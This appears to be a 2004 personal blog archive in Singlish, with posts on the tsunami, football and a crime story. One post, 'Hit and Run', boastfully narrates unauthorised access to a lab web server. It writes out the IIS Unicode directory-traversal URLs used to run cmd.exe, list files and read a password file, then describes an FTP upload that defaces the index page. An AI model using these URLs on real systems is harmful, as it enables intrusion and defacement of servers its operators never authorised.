Beng Hacks: December 2004

Wednesday, December 29, 2004

Tragic yet disgustingly exciting

I feel damn guilty, knowing that I was out having fun with my pals while around the world, ppl were dying coz of the tidal waves. When I read the news I tot it was only a small deal, but now it's 80,000 dead and counting. Sigh...

Yet, as I watch more footage of the tidal waves and see more pics, I'm more and more excited by them. How big were the waves? I remember the show Deep Impact where the waves were damn big. Some ppl said the waves were 10 metres tall! That's about 2-3 storeys! No wonder some ppl can die just as the waves hit. The force prolly smash them against walls or furniture. Am I wrong to feel excited seeing the waves?

Good news tho, Lions kicked puak chao Myanmar's ass 4 goals to 3. So freaking rough, the referee can go home and sleep liao, so many red and yellow cards didn't give, maybe he scared murdered by the fans in the carpark after the match. Best was 3rd SG goal, the player obviously stamped on our guy yet no red. Good that we scored on the free kick!

Go Lions!

Tuesday, December 21, 2004

Internet code proved to be killer giveaway

A siao woman in the US who cut out another woman's 8 mth old baby to steal it, got caught after she posted a message to buy a dog and the police traced her via IP address (dialup LOL!) to her house.

Kiang eh sai liao, mai geh kiang!

Hit and Run

Ok, here's what happened. First thing hackers always do is enumerate. Wat this means is to find out what the target is all about. I knew the server was running a web and ftp server. These are the important things I found out:

220 chan-lanlab2 Microsoft FTP Service (Version 5.0).

and

Server: Microsoft-IIS/5.0
Date: Tue, 15 Dec 2004 03:12:52 GMT
Content-Type: text/html
Content-Length: 87

So, the server was running Windows NT and/or 2000, or so I guessed =]. There was no way for me to tell what service pack the server was running so I had no choice but to trial and error. I tried a unicode hack:

http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+dir

a well known hack where IIS will change the "%255c" into "/" and properly execute the URL. If the website was hosted on the default location, ie C:\Inetpub\wwwroot\ then this URL will effectively execute C:\winnt\system32\cmd.exe and run the command dir, listing the current folder. The directory would be the website's folder.

And... voila!

Directory of C:\Lab02
...
05/11/2004 02:58p 4,786 index.htm
11/29/2004 05:17p <DIR> Lab
12/16/2004 06:07p 1,337 printenv.cgi
06/24/2004 01:20p 33 pwd
11/29/2004 02:20p <DIR> Temp
11/29/2004 02:20p <DIR> Tute
06/24/2004 01:29p 1,295 upload.cgi
06/24/2004 01:17p 945 upload.htm
...

With cmd.exe access I could execute any DOS command I want, straight from the browser! Whoa! A pwd file! I quickly put this into the URL:

http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+type+pwd


which will type out the contents of the pwd file and got:

v¦ªx£e>(¦mí±a@>D ?¦+?O+pKê?W¦¦µ`4


Shit some encrypted username and password. Viewing the upload.cgi file, dunno what language but seemed it was using AES so I dun think I can bruteforce this. Sianz thot I could use his upload form to put my stuff inside. Then it hit me, maybe the FTP server (u know lah, we can upload our assignments there) puts the files into somewhere in this folder? Listing the Temp folder confirmed my guess! It contained folders of all the PC # accounts:

Directory of C:\Lab02\Temp
...
11/29/2004 02:21p PC01

11/29/2004 02:21p PC02
...


So... I quickly FTP'ed a modified copy of the index.htm (with the Hacks logo img tag lah) and hacks.gif using my PC in the lab (PC11). Issuing a copy URL command into the browser I copied the files from the PC11 folder over to C:\lab02 and overwrote the original index.htm!!! Success!!

Cookie for me? =]

Monday, December 13, 2004

Mission Possible

Codename: Mission Possible.
Location: Somewhere with fast yummy food.
Time: Breakfast.
Mission Brief: Your mission, if you choose to accept it, will be to put the or-e-or logo on chan-lanlab2 without detection, preferrably on the index page. Enumerate, obfuscate and penetrate. This message will self-destruct in 5 years.

Hi!

Hi hi! =] How come no one post liao? =P

Thursday, December 09, 2004

Ta-Da!

Lai lai, didn't I mention that I would create this blog? Some people dared me and I dared! You think bengs cannot do this kind of thing meh? I hav special talents de... dun siao kan me ok!

Intro intro! We are the Beng Hacks! Hacks Hacks Orr Ee Orr!! Chao ah beng oso can hack what, you think oni ACS or RI bananas can hack meh? QUite easy wat...

So in the end, come come! Inferno where are you!?